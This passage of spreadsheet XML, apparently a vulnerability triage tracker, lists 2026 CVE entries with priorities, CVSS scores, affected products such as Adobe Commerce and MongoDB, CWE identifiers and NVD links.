      </c>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S272"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T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77111</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80219</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S273"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T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80219</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82064</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K274" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S274"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T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82075</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K275" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S275"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T275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86727</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr"/>
      <c r="K276" s="5" t="inlineStr"/>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S276"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T276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86727</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86732</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S277"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T277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86732</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86738</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S278" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86738</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34223</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S279"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T279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34223</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61517</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S280"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T280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61517</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74239</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S281"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T281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74239</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75990</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr"/>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S282" s="5" t="inlineStr">
        <is>
          <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T282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75990</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75991</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr"/>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S283" s="5" t="inlineStr">
        <is>
          <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T283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75991</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76190</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="S284"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T284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76190</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76199</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
      <c r="N285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O285" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P285" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q285" s="5" t="inlineStr"/>
      <c r="R285" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="S285"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T285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76199</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77109</t>
        </is>
      </c>
      <c r="D286" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E286" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F286" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr"/>
      <c r="K286" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q286" s="5" t="inlineStr"/>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S286" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77109</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77774</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr"/>
      <c r="K287" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q287" s="5" t="inlineStr"/>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S287" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77774</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79721</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr"/>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q288" s="5" t="inlineStr"/>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S288" s="5" t="inlineStr">
        <is>
          <t>Code execution can occur in versions of the MLflow platform running version 0.0.1 or newer, enabling a maliciously crafted model artifact to execute arbitrary code on an end user's system when loaded by the project.</t>
        </is>
      </c>
      <c r="T288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79721</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80097</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr"/>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q289" s="5" t="inlineStr"/>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S289" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Microsoft Authenticator allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80097</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86509</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr"/>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q290" s="5" t="inlineStr"/>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S290"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T290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86509</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
